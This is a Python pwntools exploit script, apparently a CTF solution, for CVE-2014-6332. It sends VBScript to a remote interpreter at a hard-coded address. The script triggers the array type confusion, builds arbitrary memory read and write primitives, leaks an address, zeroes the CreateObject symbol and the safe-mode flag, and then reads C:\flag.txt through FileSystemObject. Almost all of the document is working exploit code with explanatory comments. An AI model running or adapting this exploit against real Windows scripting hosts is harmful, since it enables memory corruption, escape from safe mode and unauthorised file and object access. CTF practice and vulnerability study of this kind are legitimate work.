#!/usr/bin/env python | |
from pwn import * # pip install pwntools | |
# Ref: https://swehack.org/viewtopic.php?f=18&t=216 | |
# CVE-2014-6332 | |
# | |
# 1. Trigger the array-bounds confusion (the setup described in the reference above)
# 2. Get CreateObject() back by corrupting the engine's copy of its symbol string
# 3. Turn off safe mode
# 4. Create Scripting.FileSystemObject and read C:\flag.txt
# Target service: a VBScript interpreter reachable over TCP (hard-coded CTF
# box).  Every later g() call pushes one line of script through this tube.
TARGET = ('202.112.26.109', 12345)
r = remote(*TARGET)
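def vbs_oneliner(src):
    """Collapse a multi-line VBScript snippet into one ':'-separated line.

    Blank lines and surrounding whitespace are dropped; the remaining
    statements are joined with ':' (VBScript's statement separator) so the
    whole snippet can be submitted to the interpreter as a single input line.

    NOTE: do not put VBScript ' comments in a snippet -- after joining, a
    comment would swallow every statement that follows it on the line.
    """
    stmts = [line.strip() for line in src.split('\n') if line.strip()]
    return ':'.join(stmts)


def g(x):
    """Send the VBScript snippet *x* to the remote interpreter as one line.

    Waits for the interpreter's '>>>' prompt first, echoes the collapsed
    line locally so the session can be followed, then sends it
    newline-terminated.  Uses the module-level connection ``r``.
    """
    line = vbs_oneliner(x)
    r.recvuntil('>>>')
    print(line)
    r.send(line + '\n')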
# Step 1 setup: declare the two arrays whose bounds get confused (aa/ab) and
# the size/offset scalars shared by the rest of the script.  a0 and a3 are
# randomised once (Randomize/rnd); every Over() call below advances a0 by a3,
# so the array sizes differ from attempt to attempt -- presumably to vary the
# heap layout.  win9x/intVersion/rnda/funclass are declared but never
# referenced anywhere in this script (apparently carried over from the
# reference PoC).
g('''
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
''')
# One attempt at the CVE-2014-6332 primitive.  Over() bumps a0 by a3, sets
# a1 = a0+2 and a2 = a0+&h8000000, then "redim Preserve"s aa out to the huge
# bound a2 (this is where the engine's bounds bookkeeping goes wrong), writes
# a double into ab(0) and an integer into aa(a0), and probes aa(a1) with
# VarType.  VarType = &h2f66 on aa(a1) is taken as the signature that the
# confusion worked (per the reference, aa's elements now alias ab's), and only
# then does the function return True.  On Error Resume Next hides the errors
# a failed attempt raises, and aa is shrunk back to a0 at the end either way,
# so the function can be retried in a loop.
g('''
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
redim Preserve aa(a0)
end function
''')
# Retry Over() until it reports success or all 401 attempts (0..400) are
# used up.
# NOTE(review): nothing checks the outcome -- if every attempt failed, i is
# 401 here and the script carries straight on into mydata()/rm()/wm(), which
# then operate on an unconfused array and produce garbage (and blind writes).
# Printing i and aborting when it reaches 401 would make a failed groom
# visible instead of silently corrupting the target.
g('''
For i = 0 To 400
If Over()=True Then
Exit For
End If
Next
''')
# 12 UTF-16 code units = 24 bytes, laid out like a SAFEARRAY descriptor:
# cDims=1, fFeatures=2176 (&h880), cbElements=1, cLocks=0, pvData=0, then a
# single bound of &h7fff0000 elements starting at 0.  mydata() later stores
# this string at aa(a1+2); with pvData=0 and 1-byte elements, the
# aa(a1+2)(addx) indexing in wm() becomes a byte write at absolute address
# addx.  (Layout per the reference -- verify before changing any field.)
g('''
myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
''')
# Empty procedure.  Only its identity matters: mydata() does i=testaa to get
# a reference to this routine, and that reference is (apparently) the value
# it leaks.
g('''
sub testaa()
end sub
''')
# Address leak.  While aa is confused with ab it stores a reference to testaa
# into aa(a1), then writes specific doubles into ab(0)/ab(2) -- per the
# reference their bit patterns overwrite the VARIANT type field, so the same
# slot reads back as a plain number (the pointer) rather than an object.
# Also parks the fake array descriptor (myarray) at aa(a1+2) for wm() to use.
# Returns the leaked value; the Python side prints and parses it.  On Error
# Resume Next masks any failure, so a bogus or zero result is possible if
# Over() never succeeded.
g('''
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
''')
# Arbitrary read primitive.  Under the array confusion it stores add+4 into
# aa(a1), then retypes that slot via a magic double in ab(0) so the engine
# treats the value as a BSTR pointer; lenb() then returns the 32-bit length
# field that sits 4 bytes before a BSTR's data -- i.e. the dword at `add`.
# ab(0) is reset to 0 and aa shrunk back before returning.  (Offset/type
# trick per the reference.)
g('''
function rm(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
rm=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
''')
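# Leak an address: mydata() (defined above) prints the numeric value it read
# back through the confused array.  Every offset used by the wm()/rm() calls
# below is computed relative to this value, so refuse to continue unless the
# interpreter actually answered with a number -- blind writes through wm()
# at garbage offsets would only crash the target.
g('Print mydata()')
leak = r.recvuntil('\r\n').strip()
try:
    addr = int(leak)
except ValueError:
    raise SystemExit('address leak failed, interpreter answered %r' % (leak,))
if addr == 0:
    # A zero most likely means the type confusion did not take (On Error
    # Resume Next inside mydata() hides the failure); rerun rather than
    # proceed with writes relative to address 0.
    raise SystemExit('address leak returned 0 -- heap groom did not succeed, rerun')
print('addr = ' + hex(addr))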
# Arbitrary write primitive.  aa(a1+2) holds the fake array descriptor that
# mydata() planted, so indexing it as aa(a1+2)(addx) stores ab(4) -- never
# assigned anywhere in this script, i.e. Empty/zero -- at byte address addx.
# Used below to zero a byte of the CreateObject symbol string and the
# safe-mode flag.  No return value; errors are swallowed by On Error Resume
# Next, so a failed write is indistinguishable from a successful one here.
g('''
function wm(addx)
On Error Resume Next
redim Preserve aa(a2)
aa(a1+2)(addx)=ab(4)
redim Preserve aa(a0)
end function
''')
# Step 2: get the default CreateObject() back by destroying the engine's copy
# of the symbol string "C.r.e.a.t.e.O.b.j.e.c.t", which sits 1167*4 bytes
# below the leaked address (offset per the reference); wm() zeroes one byte
# of it.
createobject_sym = addr - 1167 * 4 - 4
g('wm(%d)' % createobject_sym)

# Step 3: turn safe mode off.  COleScript::InSafeMode is
#   int __thiscall COleScript::InSafeMode(COleScript *this)
#     test byte ptr [ecx+174h], 0Bh
#     push 0 / pop eax / setnz al / retn
# i.e. it reports "safe" while any of bits 0, 1 or 3 of the byte at
# this+0x174 are set.  rm(rm(addr+8)+16) follows two pointers from the leaked
# address to what is presumably the COleScript instance; wm() then zeroes
# that byte.
safemode_anchor = addr + 8
g('wm(rm(rm(%d)+16)+&h174)' % safemode_anchor)
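# Step 4: with the default CreateObject() restored and safe mode cleared,
# drive Scripting.FileSystemObject to read the flag file.  recvuntil('}')
# assumes a CTF-style flag wrapped in braces and blocks until it arrives; the
# try/finally makes sure the socket is closed even if the connection dies
# (e.g. EOFError) before the closing brace shows up.
try:
    g('Set fso = CreateObject("Scripting.FileSystemObject")')
    g('Set f = fso.OpenTextFile("C:\\flag.txt")')
    g('Print f.ReadLine')
    print(r.recvuntil('}'))
finally:
    r.close()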